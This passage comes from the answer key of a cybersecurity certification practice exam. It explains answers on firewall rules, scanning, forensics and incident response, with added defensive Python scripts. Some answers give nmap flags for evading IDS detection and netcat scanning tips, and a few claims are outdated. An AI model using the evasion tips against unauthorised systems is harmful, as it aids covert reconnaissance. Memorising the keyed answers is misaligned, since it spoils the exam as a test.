all sites. Reversing the order of the first two rules would correct this error. There are no 
orphaned rules because every rule in the rule base is designed to meet a security require- 
ment. There are no promiscuous rules because the rules do not allow greater access than 
intended, they are simply in the wrong order. 
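
As an added illustration of the shadowed-rule check (example code, not from the book), the following Python script walks an ordered, first-match rule base and reports any rule that an earlier rule already covers, distinguishing the dangerous case where the two rules carry different actions from the merely redundant one. The rule base, the field names, and the simplified "any or identical" matching model are this example's own assumptions; a production check would also have to handle CIDR and port-range containment.

```python
"""Shadowed-rule check for a first-match firewall rule base.

Added example: rules are modelled as simple records and a field matches
only when it is "any" or identical (no CIDR or port-range containment)."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Rule:
    name: str
    action: str  # "allow" or "deny"
    src: str     # source host/network name or "any"
    dst: str     # destination host/network name or "any"
    port: str    # service ports or "any"


def covers(earlier: Rule, later: Rule) -> bool:
    """True when every packet matched by `later` is also matched by `earlier`.

    A field of "any" on the earlier rule matches everything; otherwise the
    two values must be identical (this simplified model is an assumption)."""
    return all(getattr(earlier, f) in ("any", getattr(later, f))
               for f in ("src", "dst", "port"))


def find_shadowed(rules: List[Rule]) -> List[Tuple[str, str, bool]]:
    """Return (shadowed, shadowing, action_conflict) for every rule that can
    never fire because an earlier rule already covers all of its traffic.

    action_conflict is True when the two rules disagree, which is the
    dangerous case (a deny placed below a matching allow); a shadowed rule
    with the same action is only redundant."""
    findings = []
    for i, later in enumerate(rules):
        for earlier in rules[:i]:
            if covers(earlier, later):
                findings.append((later.name, earlier.name,
                                 earlier.action != later.action))
                break  # report the first shadowing rule only
    return findings


def reorder_to_unshadow(rules: List[Rule]) -> List[Rule]:
    """Move each conflicting shadowed rule directly above the rule that
    shadows it, which is the correction described for this scenario."""
    fixed = list(rules)
    for shadowed, shadower, conflict in find_shadowed(rules):
        if not conflict:
            continue
        moving = next(r for r in fixed if r.name == shadowed)
        fixed.remove(moving)
        target = next(i for i, r in enumerate(fixed) if r.name == shadower)
        fixed.insert(target, moving)
    return fixed


# Constructed rule base for the scenario: the deny for blocked sites sits
# below a rule that already allows web traffic to any destination.
RULES = [
    Rule("allow-web",    "allow", "any", "any",           "80,443"),
    Rule("deny-blocked", "deny",  "any", "blocked-sites", "80,443"),
    Rule("allow-dns",    "allow", "any", "dns-servers",   "53"),
    Rule("deny-all",     "deny",  "any", "any",           "any"),
]

if __name__ == "__main__":
    for shadowed, by, conflict in find_shadowed(RULES):
        print(f"{shadowed} is shadowed by {by}"
              f"{' (conflicting action!)' if conflict else ''}")
    print("corrected order:", [r.name for r in reorder_to_unshadow(RULES)])
```

Running the script reports that deny-blocked is shadowed by allow-web with a conflicting action, and the corrected order places the deny rule first; a second pass over the corrected list finds nothing, which is the check to run after any rule-base change.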


C. All of the data sources listed in this question may provide Jay with further information 
about the attack. However, firewall logs would be best positioned to answer his specific 
question about the source of the attack. Since the firewall is performing network address 
translation (NAT), it would likely have a log entry of the original (pre-NAT) source IP 
address of the traffic. 


D. These results show the network path between Jim’s system and the CompTIA web 
server. It is not unusual to see unknown devices in the path, represented by * * * because 
those devices may be configured to ignore traceroute requests. These query results 
do indicate that the network path passes through Chicago, but this does not mean that 
the final destination is in Chicago. There is no indication that the website is down. 
216.182.225.74 is the system closest to Jim in this result, while 216.55.11.62 is the closest 
system to the remote server. 


D. An uncredentialed scan provides far less information than a credentialed scan or an 
agent-based scan because both credentialed and agent-based scans are able to gather con- 
figuration information from the target systems. External scans also provide less informa- 
tion than internal scans because they are filtered by border firewalls and other security 
devices. Therefore, an uncredentialed external scan would provide the least information. 


B. NIST SP800-88, along with many forensic manuals, requires a complete zero wipe of 
the drive but does not require multiple rounds of wiping. Degaussing is primarily used for 
magnetic media like tapes and may not completely wipe a hard drive (and may, in fact, 
damage it). Using the ATA Secure Erase command is commonly used for SSDs. 


B. NIST recommends that clock synchronization is performed for all devices to improve 
the ability of responders to conduct analysis, part of the detection and analysis phase of 
the NIST incident response process. While this might occur in the preparation phase, it is 
intended to improve the analysis process. 


A. Susan knows that Windows domain services can be blocked using a network firewall. 
As long as she builds the correct ruleset, she can prevent external systems from sending 
this type of traffic to her Windows workstations. She may still want to segment her net- 
work to protect the most important workstations, but her first move should be to use her 
firewalls to prevent the traffic from reaching the workstations. 


C. Fred’s SNMP command requested the route table from the system called device1. 
This can be replicated on the local system using netstat -nr. The traceroute command 
provides information about the path between two systems. The route command could be 
used to get this information, but the command listed here adds a default gateway rather 
than querying current information. ping -r records the route taken to a site for a given 
number of tries (between 1 and 9). 


D. When the Internet Engineering Task Force (IETF) endorsed SNMP v3.0 as a standard, 
it designated all earlier versions of SNMP as obsolete. Shannon should upgrade this device 
to SNMP 3.0. 


B. The systems in the containment network are fully isolated from the rest of the network 
using logical controls that prevent any access. To work with the systems that he needs to 
access, Frank will need to either have firewall rules added to allow him remote access to 
the systems or physically work with them. 


B. On Linux systems that use the bash shell, $HOME/.bash_history will contain a log of 
recently performed actions. Each of the others was made up for this question. 


B. NIST SP-800-88 recommends clearing media and then validating and documenting 
that it was cleared. Clearing uses logical techniques to sanitize data in user-addressable 
storage locations and protects against noninvasive data recovery techniques. This level of 
security is appropriate to moderately sensitive data contained on media that will remain in 
an organization. 


C. Task 3 strikes the best balance between criticality and difficulty. It allows her to 
remediate a medium criticality issue with an investment of only 6 hours of time. Task 
2 is higher criticality but would take 12 weeks to resolve. Task 1 is the same criticality 
but would require a full day to fix. Task 4 is lower criticality but would require the same 
amount of time to resolve as Task 1. 


D. The use of a stolen cookie is the hallmark of a session hijacking attack. These attacks 
focus on taking over an already existing session, either by acquiring the session key or 
cookies used by the remote server to validate the session or by causing the session to pass 
through a system the attacker controls, allowing them to participate in the session. 


C. Pete’s organization is using an agent-based, out-of-band NAC solution that relies on a 
locally installed agent to communicate to existing network infrastructure devices about the 
security state of his system. If Pete’s organization used dedicated appliances, it would be an 
in-band solution, and of course not having an agent installed would make it agentless. 


B. The registry contains autorun keys that are used to make programs run at startup. In 
addition, scheduled tasks, individual user startup folders, and DLLs placed in locations 
that will be run by programs (typically malicious DLLs) are all locations where files will 
automatically run at startup or user login. 


B. The biggest issue in this scenario is that both factors are knowledge-based factors. A 
true multifactor system relies on more than one type of distinct factor including some- 
thing you know, something you have, or something you are (and sometimes where you 
are). This system relies on two things you know, and attackers are likely to acquire both 
from the same location in a successful attack. 


A. The order of volatility of data measures how easy the data is to lose. The Volatility 
Framework is a forensic tool aimed at memory forensics, while data transience and data 
loss prediction are not common terms. 


C. Mika is using netcat to grab the default HTTP response from a remote server. Using 
netcat like this allows penetration testers to gather information quickly using scripts or 
manually when interaction may be required or tools are limited. 


B. Playbooks contain specific procedures used during a particular type of cybersecurity 
incident. In this case, the playbook entry addresses malware command and control traf- 
fic validation. Creating a CSIRT or IR plan occurs at a higher level, and IR-FAQs is not a 
common industry term. 


D. Kristen should upgrade the web server to the most current secure version of TLS: TLS 
1.2. SSL 3.0 has vulnerabilities similar to those in TLS 1.0 and is not a suitable alterna- 
tive. IPsec is not effective for web communications. Disabling the use of TLS would jeop- 
ardize the security of information sent to and from the server and would create additional 
risk, rather than remedying the situation. 


C. Relatively few organizations run honeypots because of the effort required to maintain 
and analyze the data they generate. DNS queries and other traffic logs, threat intelligence 
feeds, and notifications from staff are all common information sources for a variety of 
types of incident detection. 


Chapter 5: Practice Exam 1 405 


D. Context-based authentication may leverage a wide variety of information. Potential 
attributes include time of day, location, device fingerprint, frequency of access, user roles, 
user group memberships, and IP address/reputation. 


B. Application or token-based multifactor authentication ensures that the exposure of a 
password because of successful phishing email does not result in the compromise of the 
credential. Password complexity increases fail to add security since complex passwords 
can still be compromised by phishing attacks, biometric multifactor authentication is 
typically expensive to implement and requires enrollment, and OAuth-based single sign- 
on will not prevent phishing attacks; instead, it can make it easier for attackers to move 
between multiple services. 


D. In an open redirect attack, users may be sent to a genuine authentication server and 
then redirected to an untrusted server through the OAuth flow. This occurs when the 
authentication server does not validate OAuth server requests prior to redirection. 


B. While packet capture can help Max document his penetration test and gather 
additional information about remote systems through packet analysis, as well as help 
troubleshoot connection and other network issues, sniffers aren’t useful for scanning for 
vulnerabilities on their own. 


D. Rich should not attempt to solve this problem on his own or dictate a specific solution. 
Instead, he should work with the business intelligence team to find a way to both meet 
their business requirements and accomplish the security goals achieved by scanning. 


D. The Gramm-Leach-Bliley Act (GLBA) applies specifically to the security and privacy 
of information held by financial institutions. HIPAA applies to healthcare providers. PCI 
DSS applies to anyone involved in the processing of credit card transactions. This does 
include financial institutions but is not limited to those institutions as it also applies to 
merchants and service providers. Sarbanes-Oxley applies to all publicly traded corpora- 
tions, which includes, but is not limited to, some financial institutions. 


C. Policies that allow employees to bring personally owned devices onto corporate net- 
works are known as bring your own device (BYOD) policies. Corporate-owned person- 
ally enabled (COPE) strategies allow employees to use corporate devices for personal use. 
SAFE is not a mobile device strategy. 


B. Richard knows that mounting forensic images in read-only mode is important. To 
prevent any issues with executable files, he has also set the mounted image to noexec. He 
has also taken advantage of the automatic filesystem type recognition built into the mount 
command and has set the device to be a loop device, allowing the files to be directly 
interacted with after mounting. 


D. Blind SQL injection vulnerabilities are difficult to detect and are a notorious source of 
false positive reports. Javier should verify the results of the tests performed by the devel- 
opers but should be open to the possibility that this is a false positive report, as that is the 
most likely scenario. 


B. netcat is often used as a port scanner when a better port scanning tool is not avail- 
able. The -z flag is the zero I/O mode and is used for scanning. While -v is useful, it isn’t 
required for scanning and won’t provide a scan by itself. The -sS flag is used by nmap and 
not by netcat. 


D. Intrusion alarms designed to alert staff to a facility break-in are a clear example of 
physical controls because they are monitoring for a physical intrusion. The design of the 
alarm is not an administrative control, but the process for reacting to alarms would fall 
into that category. Physical intrusion alarms are not logical controls, although a network 
intrusion detection system would be a logical control. There is no indication that this 
alarm will compensate for the failure to meet a different control objective, so this is not a 
compensating control. 


A. During penetration tests, the red team members are the attackers, the blue team 
members are the defenders, and the white team establishes the rules of engagement and 
performance metrics for the test. 


C. Lauren knows that the file she downloaded and computed a checksum for does not 
match the MD5 checksum that was calculated by the providers of the software. She does 
not know if the file is corrupt or if attackers have modified the file but may want to con- 
tact the providers of the software to let them know about the issue, and she definitely 
shouldn’t execute or trust the file! 
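
Added example (not the book's code) of the hash comparison behind Lauren's checksum problem and the earlier write-blocker answer: it hashes media and its image with several algorithms in one chunked pass, and checks a downloaded file against a vendor-published checksum. The 512 KiB "drive", the tampered image, and the checksum strings are constructed; SHA-256 is recorded alongside MD5 and SHA-1 because collisions are known for the latter two.

```python
"""Hash verification for forensic images and downloaded files.

Added example: the "drive" bytes and the published checksum are constructed
inline so the script runs offline."""
import hashlib
import hmac
from typing import Dict, Iterable

ALGORITHMS = ("md5", "sha1", "sha256")


def hash_bytes(data: bytes, algorithms: Iterable[str] = ALGORITHMS,
               chunk: int = 1 << 16) -> Dict[str, str]:
    """Hash `data` with several algorithms in one pass, consuming it in
    chunks the way a tool would read a multi-gigabyte image."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    for offset in range(0, len(data), chunk):
        block = data[offset:offset + chunk]
        for h in hashers.values():
            h.update(block)
    return {name: h.hexdigest() for name, h in hashers.items()}


def verify_image(source: bytes, image: bytes) -> Dict[str, bool]:
    """Compare the hash of the original media with the hash of its image.
    A mismatch under any algorithm means the image is not a faithful copy."""
    src, img = hash_bytes(source), hash_bytes(image)
    return {name: hmac.compare_digest(src[name], img[name]) for name in src}


def checksum_matches(data: bytes, published: str, algorithm: str) -> bool:
    """Check a download against a vendor-published checksum. Whitespace and
    letter case in the published value are normalised; False means the file
    must not be trusted or executed."""
    computed = hashlib.new(algorithm, data).hexdigest()
    return hmac.compare_digest(computed, published.strip().lower())


# Constructed media: a 512 KiB pattern standing in for a disk, a faithful
# image of it, and an image with a single flipped bit.
DRIVE = bytes(range(256)) * 2048
GOOD_IMAGE = bytes(DRIVE)
_tampered = bytearray(DRIVE)
_tampered[100_000] ^= 0x01
BAD_IMAGE = bytes(_tampered)

if __name__ == "__main__":
    print("good image:", verify_image(DRIVE, GOOD_IMAGE))
    print("bad image: ", verify_image(DRIVE, BAD_IMAGE))
    # MD5 of the ASCII string "abc", a well-known test vector
    print(checksum_matches(b"abc", "900150983CD24FB0D6963F7D28E17F72", "md5"))
```

The single flipped bit in BAD_IMAGE changes every digest, which is the property an examiner relies on when the drive hash and the image hash are compared after acquisition.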


C. Microsoft announced the end of life for Internet Explorer and will no longer support it 
in the future. However, they still provide support for Internet Explorer 11, which is widely 
used. This is the only version of Internet Explorer currently considered secure. 


D. While it may be tempting to assign blame based on an IP address, attackers frequently 
use compromised systems for attacks. Some may also use cloud services and hosting com- 
panies where they can purchase virtual machines or other resources using stolen credit 
cards. Thus, knowing the IP address from which an attack originated will typically not 
provide information about an attacker. In some cases, deeper research can identify where 
an attack originated, but even then knowing the identity of an attacker is rarely certain. 


B. auth.log will contain new user creations and group additions as well as other useful 
information with timestamps included. /etc/passwd does not include user creation dates 
or times. Checking file creation and modification times for user home directories and bash 
sessions may be useful if the user has a user directory and auth.log has been wiped or is 
unavailable for some reason. 
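
An added example (not from the book) of pulling account changes out of auth.log: it parses the lines written by useradd, usermod, groupadd, and userdel, keeps their timestamps, and flags additions to privileged groups. The sample log lines and the list of privileged group names are constructed for this example.

```python
"""Extract account and group changes from auth.log and flag privileged ones.

Added example: the log lines are constructed in the message format written
by the shadow-utils useradd/usermod/groupadd/userdel programs, and the set
of privileged group names is this example's own assumption."""
import re
from typing import Dict, List

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<proc>useradd|usermod|groupadd|userdel|groupdel)\[\d+\]: (?P<msg>.*)$"
)

# (event kind, message pattern, (name, detail) extractor)
PATTERNS = [
    ("user_created", re.compile(r"new user: name=(?P<name>[^,]+), UID=(?P<uid>\d+)"),
     lambda m: (m["name"], "uid=" + m["uid"])),
    ("group_created", re.compile(r"new group: name=(?P<name>[^,]+), GID=(?P<gid>\d+)"),
     lambda m: (m["name"], "gid=" + m["gid"])),
    # usermod also logs "to shadow group"; that duplicate line is skipped on purpose
    ("group_membership", re.compile(r"add '(?P<name>[^']+)' to group '(?P<group>[^']+)'"),
     lambda m: (m["name"], m["group"])),
    ("deleted", re.compile(r"delete (?:user|group) '(?P<name>[^']+)'"),
     lambda m: (m["name"], "")),
]

PRIVILEGED_GROUPS = {"sudo", "wheel", "admin", "adm", "root"}


def parse_auth_log(text: str) -> List[Dict[str, str]]:
    """Return one event per account-management line, timestamp included.
    Lines from sshd, sudo, cron and so on are not account changes and are
    skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        for kind, pattern, extract in PATTERNS:
            hit = pattern.search(m["msg"])
            if hit:
                name, detail = extract(hit)
                events.append({"ts": m["ts"], "host": m["host"], "proc": m["proc"],
                               "kind": kind, "name": name, "detail": detail})
                break
    return events


def privileged_changes(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Membership changes that grant administrative rights; these deserve a
    ticket or an alert, not just a log entry."""
    return [e for e in events
            if e["kind"] == "group_membership" and e["detail"] in PRIVILEGED_GROUPS]


# Constructed auth.log excerpt.
SAMPLE_LOG = """\
Mar  3 09:12:01 web01 sshd[2290]: Accepted publickey for alice from 10.0.0.5 port 51234 ssh2
Mar  3 09:12:40 web01 groupadd[2314]: new group: name=svc_backup, GID=1003
Mar  3 09:12:40 web01 useradd[2314]: new user: name=svc_backup, UID=1003, GID=1003, home=/home/svc_backup, shell=/bin/bash
Mar  3 09:13:45 web01 usermod[2330]: add 'svc_backup' to group 'sudo'
Mar  3 09:13:45 web01 usermod[2330]: add 'svc_backup' to shadow group 'sudo'
Mar  3 09:15:10 web01 groupadd[2360]: new group: name=ops, GID=1004
Mar  3 09:16:22 web01 userdel[2371]: delete user 'tmpuser'
"""

if __name__ == "__main__":
    for e in parse_auth_log(SAMPLE_LOG):
        print(f"{e['ts']} {e['kind']:16} {e['name']} {e['detail']}")
    for e in privileged_changes(parse_auth_log(SAMPLE_LOG)):
        print("ALERT: privileged group change:", e["name"], "->", e["detail"])
```

Because the timestamp travels with each event, the output gives exactly what /etc/passwd cannot: when the account appeared and when it was granted sudo rights.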


B. Completely removing the systems involved in the compromise will ensure that they 
cannot impact the organization’s other production systems. While attackers may be 
able to detect this change, it provides the best protection possible for the organization’s 
systems. 


C. Michelle should deploy the patch in a sandbox environment and then thoroughly test 
it prior to releasing it in production. This reduces the risk that the patch will not work 
well in her environment. Simply asking the vendor or waiting 60 days may identify some 
issues, but it does not sufficiently reduce the risk because the patch will not have been 
tested in her company’s environment. 


C. The most likely scenario is that Kent ran the scan from a network that does not have 
access to the CRM server. Even if the server requires strong authentication and/or encryp- 
tion, this would not prevent ports from appearing as open on the vulnerability scan. The 
CRM server runs over the web, as indicated in the scenario. Therefore, it is most likely 
using ports 80 and/or 443, which are part of the default settings of any vulnerability 
scanner. 


D. nmap provides multiple scan modes, including a TCP SYN scan, denoted by the -sS 
flag. This is far stealthier than the full TCP connect scan, which uses the -sT flag. Turning 
off pings with the -P0 flag helps with stealth, and setting the scan speed using the -T flag 
to either a 0 for paranoid or a 1 for sneaky will help bypass many IDSs by falling below 
their detection threshold. 


C. Control objectives provide organizations with high-level descriptions of the controls 
that they can implement for their information technology systems. The framework orga- 
nizes objectives by subject-matter domain. The process descriptions provide a common 
language and business process model for the organization. Maturity models provide orga- 
nizations with a means to assess their adherence to the standard. 


C. Of the criteria listed, the operating system installed on the systems is the least likely to 
have a significant impact on the likelihood and criticality of discovered vulnerabilities. All 
operating systems are susceptible to security issues. 


A. In this case, the identity or network location of the server is not relevant. Donna is 
simply interested in the most critical vulnerability, so she should select the one with the 
highest severity. In vulnerability severity rating systems, severity 5 vulnerabilities are the 
most critical, and severity 1 are the least critical. Therefore, Donna should remediate 
the severity 5 vulnerability in the file server. 


A. Policies are the highest-level component of an organization’s governance documen- 
tation. They are set at the executive level and provide strategy and direction for the 
cybersecurity program. Standards and procedures derive their authority from policies. 
Frameworks are not governance documents but rather provide a conceptual structure for 
organizing a program. Frameworks are usually developed by third-party organizations, 
such as ISACA or ITIL. 


A. Vulnerability scanning information is most effective in the hands of individuals who 
can correct the issues. The point of scans is not to “catch” people who made mistakes. 
Chris should provide the administrators with access. The security team may always moni- 
tor the system for unremediated vulnerabilities, but they should not act as a gatekeeper to 
critical information. 


C. SNMP v3 is the current version of SNMP and provides message integrity, authentica- 
tion, and encryption capabilities. Chris may still need to address how his organization 
configures SNMP, including what community strings they use. SNMP versions 1 and 2 do 
not include this capability, and version 4 doesn’t exist. 


D. Bare-metal virtualization does not impose any requirements on the diversity of guest 
operating systems. It is very common to find Linux and Windows systems running on the 
same platform. Bare-metal virtualization does not use a host operating system. Instead, it 
runs the hypervisor directly on top of the physical hardware. 


B. This vulnerability results in an information disclosure issue. Paul can easily correct it 
by disabling the directory listing permission on the cgi-bin directory. This is unlikely to 
affect any other use of the server because he is not altering permissions on the CGI scripts 
themselves. Blocking access to the web server and removing CGI from the server would 
also resolve the vulnerability but would likely have an undesirable business impact. 


C. Observable occurrences are classified as events in NIST’s scheme. Events with negative 
consequences are considered adverse events, while violations (or even imminent threats of 
violations) are classified as security incidents. 


A. This is a valid DNS search result from dig. In this dig request, the DNS server located 
at 172.30.0.2 answered Sally’s request and responded that the comptia.org server is 
located at 198.134.5.6. 


C. The most likely issue is that an intrusion prevention system is detecting the scan as an 
attack and blocking the scanner. If this were a host or network firewall issue, Fran would 
most likely not be able to access the server using a web browser. It is less likely that the 
scan is misconfigured given that Fran double-checked the configuration. 


C. The presence of this vulnerability does indicate a misconfiguration on the targeted 
server, but that is not the most significant concern that Ty should have. Rather, he should 
be alarmed that the domain security policy does not prevent this configuration and should 
know that many other systems on the network may be affected. This vulnerability is not 
an indicator of an active compromise and does not rise to the level of a critical flaw. 


B. SNMP v1 through v2c all transmit data in the clear. Instead, Chris should move his 
SNMP monitoring infrastructure to use SNMP v3. Adding complexity requirements helps 
to prevent brute-force attacks against community strings, while TLS protects against data 
capture. Using different community strings based on security levels helps to ensure that a 
single compromised string can’t impact all of the devices on a network. 


C. This vulnerability has a low severity, but that could be dramatically increased if the 
management interface is exposed to external networks. If that were the case, it is possible 
that an attacker on a remote network would be able to eavesdrop on administrative con- 
nections and steal user credentials. Out-of-date antivirus definitions and missing security 
patches may also be severe vulnerabilities, but they do not increase the severity of this spe- 
cific vulnerability. The lack of encryption is already known because of the nature of this 
vulnerability, so confirming that fact would not change the severity assessment. 


B. Both ports 22 and 23 should be of concern to Nancy because they indicate that the 
network switch is accepting administrative connections from a general-use network. 
Instead, the switch should only accept administrative connections from a network man- 
agement VLAN. Of these two results, port 23 should be of the greatest concern because it 
indicates that the switch is allowing unencrypted telnet connections that may be subject to 
eavesdropping. The results from ports 80 and 8192 to 8194 are of lesser concern because 
they are being filtered by a firewall. 
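
Added example (not the book's code) that triages nmap output like the switch scan described here, and also illustrates the earlier point that a "filtered" result only records that no answer came back rather than proving a firewall was detected. The scan text, the port-to-service risk tables, and the severity labels are this example's own constructions.

```python
"""Triage open/filtered ports from an nmap scan of a network device.

Added example: the scan output is constructed in nmap's normal output
format and the port-to-risk tables are this example's own assumptions."""
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Tuple

PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open\|filtered|closed\|filtered|open|closed|filtered|unfiltered)\s+"
    r"(?P<service>\S+)"
)


class PortResult(NamedTuple):
    port: int
    proto: str
    state: str
    service: str


# Management services; the cleartext ones expose credentials to eavesdropping.
CLEARTEXT_ADMIN = {21: "ftp", 23: "telnet", 80: "http", 161: "snmp"}
ENCRYPTED_ADMIN = {22: "ssh", 443: "https", 3389: "rdp"}


def parse_nmap(text: str) -> List[PortResult]:
    """Keep only the per-port lines; headers and 'Not shown' lines are skipped."""
    results = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            results.append(PortResult(int(m["port"]), m["proto"],
                                      m["state"], m["service"]))
    return results


def state_summary(results: List[PortResult]) -> Dict[str, int]:
    """Count port states. 'filtered' only means no answer reached nmap; it
    does not by itself prove that a firewall or IPS was detected, and
    'closed' means nothing was listening when the probe arrived."""
    return dict(Counter(r.state for r in results))


def flag_management_exposure(results: List[PortResult],
                             scanned_from_management_vlan: bool = False
                             ) -> List[Tuple[int, str, str]]:
    """Rank open management ports seen from the scanner's network.

    high:   cleartext administrative protocol (telnet, http, ...)
    medium: encrypted administrative protocol reachable outside the
            management VLAN
    Filtered and closed ports produce no finding."""
    findings = []
    for r in results:
        if r.state != "open" or scanned_from_management_vlan:
            continue
        if r.port in CLEARTEXT_ADMIN:
            findings.append((r.port, "high",
                             f"unencrypted {CLEARTEXT_ADMIN[r.port]} admin access"))
        elif r.port in ENCRYPTED_ADMIN:
            findings.append((r.port, "medium",
                             f"{ENCRYPTED_ADMIN[r.port]} reachable from a general-use network"))
    rank = {"high": 0, "medium": 1}
    return sorted(findings, key=lambda f: (rank[f[1]], f[0]))


# Constructed scan of a switch, taken from a general-use VLAN.
SAMPLE_SCAN = """\
Nmap scan report for switch01 (10.0.1.5)
Host is up (0.0021s latency).
Not shown: 994 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   filtered http
8192/tcp filtered sophos
8193/tcp filtered sophos
8194/tcp filtered sophos
"""

if __name__ == "__main__":
    ports = parse_nmap(SAMPLE_SCAN)
    print(state_summary(ports))
    for port, severity, why in flag_management_exposure(ports):
        print(f"{severity:6} {port:5} {why}")
```

The output ranks port 23 above port 22, matching the reasoning in the answer: both show administrative access from a general-use network, but only telnet sends credentials in the clear, and the filtered ports are left out of the findings entirely.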


B. All of the scenarios described here could result in failed vulnerability scans and are 
plausible on this network. However, the fact that the Apache logs do not show any denied 
requests indicates that the issue is not with an .htaccess file on the server. If this were 
the case, Evan would see evidence of it in the Apache logs. 


C. The shim cache is used by Windows to track scripts and programs that need specialized 
compatibility settings. It is stored in the registry at shutdown, which means that a thorough 
registry cleanup will remove program references from it. The master file table (MFT), vol- 
ume shadow copies, and prefetch files can all contain evidence of deleted applications. 


D. Fuzz testing involves sending invalid or random data to an application to test its ability 
to handle unexpected data. Fault injection directly inserts faults into error-handling paths, 
particularly error-handling mechanisms that are rarely used or might otherwise be missed 
during normal testing. Mutation testing is related to fuzzing and fault injection, but rather 
than changing the inputs to the program or introducing faults to it, mutation testing 
makes small modifications to the program itself. Stress testing is a performance test that 
ensures applications and the systems that support them can stand up to the full produc- 
tion load. 


C. While TCP ports 21, 23, 80, and 443 are all common ports, 515 and 9100 are com- 
monly associated with printers. 


B. The netstat command is used to generate a list of open network connections on a 
system, such as the one shown here. traceroute is used to trace the network path 
between two hosts. ifconfig is used to display network configuration information on 
Linux and Mac systems. The sockets command does not exist. 


C. NIST identifies four major categories of security event indicators: alerts, logs, publicly 
available information, and people both inside and outside the organization. Exploit 
developers may provide some information but are not a primary source of security event 
information. 


D. A host that is not running any services or that has a firewall enabled that prevents 
responses can be invisible to nmap. Charles cannot determine whether there are hosts on 
this network segment and may want to use other means such as ARP queries, DHCP logs, 
and other network layer checks to determine whether there are systems on the network. 


D. The Business Impact Assessment (BIA) is an internal document used to identify and 
assess risks. It is unlikely to contain customer requirements. Service Level Agreements 
(SLAs), Business Partner Agreements (BPAs), and Memorandums of Understanding 
(MOUs) are much more likely to contain this information. 


C. Web servers commonly run on ports 80 (for HTTP) and 443 (for HTTPS). Database 
servers commonly run on ports 1433 (for Microsoft SQL Server), 1521 (for Oracle), or 
3306 (for MySQL). Remote Desktop Protocol services commonly run on port 3389. Sim- 
ple Mail Transfer Protocol (SMTP) runs on port 25. There is no evidence that SSH, which 
uses port 22, is running on this server. 
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C. You may not be familiar with Scalpel or other programs you encounter on the exam. 
In many cases, the problem itself will provide clues that can help you narrow down your 
answer. Here, pay close attention to the command-line flags, and note the -o flag, a com- 
mon way to denote an output file. In practice, Scalpel automatically creates directories for 
each of the file types that it finds. Selah simply needs to visit those directories to review 
the files that she has recovered. She does not need to use another program. The filenames 
and directory structures may not be recoverable when carving files. 


C. Trusted foundries are part of the Department of Defense's program that ensures that 
hardware components are trustworthy and have not been compromised by malicious 
actors. A TPM (Trusted Platform Module) is a cryptographic coprocessor chip, not a supply-chain 
assurance program; OEMs are original equipment manufacturers that do not necessarily source 
their components from trusted suppliers; and gray-market providers sell hardware outside of 
their normal or contractually allowed channels. 


D. Resource exhaustion is a type of structural failure as defined by the NIST threat 
categories. It might be tempting to categorize this as accidental because Adam did not 
notice the alarms; however, accidental threats are specifically caused by individuals doing 
routine work who undermine security through their actions. In this case, the structural 
nature of the problem is the more important category. 


B. While all of these policies may contain information about data security, Ben is specifi- 
cally interested in grouping information into categories of similar sensitivity. This is the 
process of data classification. A data retention policy would contain information on the 
data life cycle. An encryption policy would describe what data must be encrypted and 
appropriate encryption techniques. A data disposal policy would contain information on 
properly destroying data at the end of its life cycle. 


A. The Windows equivalent to the Linux ifconfig command is ipconfig. netstat 
displays information about open network connections rather than network interface 
configuration. The ifconfig and netcfg commands do not exist on Windows. 


B. The PHP language is used for the development of dynamic web applications. The pres- 
ence of PHP on this server indicates that it is a web server. It may also be running 
database, time, or network management services, but the scan results provide no evidence 
of this. 


B. CompTIA includes patching, permissions, scanning, verifying logging, and communi- 
cating to security monitoring systems in the validation stage. This differs from the NIST 
standard, which groups activities into eradication and recovery phases. 


D. NIST describes attrition attacks as attacks that employ brute-force methods to com- 
promise, degrade, or destroy systems, networks, or services. A DDoS attack seeks to 
degrade or prevent access to systems, services, or networks. 


A. An internal network vulnerability scan will provide an insider’s perspective on the 
server’s vulnerabilities. It may provide useful information, but it will not meet Taylor’s 
goal of determining what an external attacker would see. 


A. FTP sends the username in a separate packet. Chris can determine that this was 
an FTP connection, that the password was gnome123, and that the FTP server was 
137.30.120.40. 
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B. The spike shown just before July appears to be out of the norm for this network since it 
is almost four times higher than normal. Cynthia may want to check to see what occurred 
during that time frame to verify whether it was normal traffic for her organization. 


A. Evidence production procedures describe how the organization will respond to sub- 
poenas, court orders, and other legitimate requests to produce digital evidence. Monitor- 
ing procedures describe how the organization will perform security monitoring activities, 
including the possible use of continuous monitoring technology. Data classification proce- 
dures describe the processes to follow when implementing the organization’s data classifi- 
cation policy. Patching procedures describe the frequency and process of applying patches 
to applications and systems under the organization’s care. 


D. This Windows system is likely running an unencrypted (plain-text) web server, as well 
as both the Microsoft RPC and Microsoft DS (SMB) services on TCP 135 and 445, respectively. 
SSH would typically be associated with port 22, while email via SMTP is on TCP port 25. 


B. The IT Infrastructure Library (ITIL) provides guidance on best practices for imple- 
menting IT service management, including help desk support. ISO provides high-level 
standards for a wide variety of business and manufacturing processes. COBIT provides 
control objectives for IT governance. PCI DSS provides security standards for handling 
credit card information. 


D. Adding new signatures (prior to an incident) is part of the preparation phase because it 
prepares an organization to detect attacks. 


D. For best results, Mike should combine both internal and external vulnerability scans 
because this server has both public and private IP addresses. The external scan provides 
an “attacker’s eye view” of the web server, while the internal scan may uncover vulner- 
abilities that would be exploitable only by an insider or an attacker who has gained access 
to another system on the network. 


C. Windows Defender is set to Disabled, and the network protections are set to Manual, 
meaning that the system’s antivirus is likely disabled. This does not necessarily mean that 
the system is infected with malware, but some malware does attempt to disable antivirus 
software. The Windows Event Collector that is set to Manual collects remote WMI events 
and will not prevent the system from logging normally. 


C. NIST recommends the usage of NTP to synchronize clocks throughout organizational 
infrastructure, thus allowing logs, alerts, and other data to be analyzed more easily dur- 
ing incident response. Manually setting clocks results in time skew, incorrect clocks, and 
other time-related problems. 


A. TCP 135, 139, and 445 are all common Windows ports. The addition of 3389, the 
